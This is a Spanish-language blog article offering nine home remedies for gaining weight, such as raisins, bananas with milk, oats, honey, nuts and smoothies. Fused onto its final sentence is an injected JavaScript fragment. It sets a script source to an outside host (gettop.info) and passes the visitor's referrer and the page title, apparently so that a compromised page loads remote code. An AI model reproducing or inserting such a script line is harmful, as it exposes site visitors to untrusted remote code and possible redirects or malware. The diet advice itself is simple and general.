Salud y belleza » Alimentación, Dieta

Fórmulas caseras para subir de peso fácilmente

6 Comentarios

A menudo, la sátira representa una gran opción para analizar un contexto. Por caso, en un episodio de la comedia animada norteamericana por antonomasia, esa protagonizada por la familia amarilla, el protagonista intenta aumentar de peso para lograr de ese modo trabajar desde su hogar dando parte de discapacitado. Y para ganar masa/grasa , recurre a todo tipo de remedios exóticos: cepillarse los dientes con refrescos dulces, el modo más pintoresco.

Naturalmente, una comedia es solo eso: un ejercicio práctico para generar risas y nada más. En la ciencia de la medicina que rige en el mundo real, subir de peso es una tarea delicada, a menudo difícil, que debe ser llevada a cabo con sumo cuidado.

De todos modos, en algo sí coinciden realidad y ficción: realmente existen trucos para conseguir ese objetivo. Claro, los reales son mucho más ortodoxos y, naturalmente, saludables. Veamos de qué se trata cada uno.

  • Opción para ganar peso número uno: consumir treinta gramos de pasas por día durante un mes.
  • Opción para ganar peso número dos: comer un plátano junto con un vaso de leche diariamente durante una semana.
  • Opción para ganar peso número tres: ingerir diariamente, por un mes, una taza de avena en hojuelas mezclada con leche.
  • Opción para ganar peso número cuatro: tomar un vaso de leche caliente con una cucharada de miel (mantener el hábito hasta ganar el peso).
  • Opción para ganar peso número cinco: comer cuatro higos secos y cuatro nueces de forma periódica por un mes.
  • Opción para ganar peso número seis: emplear cinco cucharaditas por día de levadura de cerveza en polvo  para espolvorear cualquier tipo de alimento que se vaya a consumir, desde infusiones hasta yogures, zumos o batidos. Vale destacar que este remedio no está recomendado para personas que padecen e ácido úrico elevado.
  • Opción para ganar peso número siete: colocar frutos secos y semillas en las comidas que correspondan al almuerzo y la cena.
  • Opción para ganar peso número ocho: beber de forma regular zumos de soya que contengan hierro, zinc y vitaminas en lugar de tomar el regular.
  • Opción para ganar  peso número nueve: cambiar las infusiones calientes del desayuno y la merienda, por batidos o licuados con leche y frutas.

Como vemos, no hace falta acudir a las grasas ni otras fórmulas peligrosas para subir de peso: hacerlo de modo natural también es posible. El resto de los trucos, mejor dejémoslos para los profesionales de la ficción.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';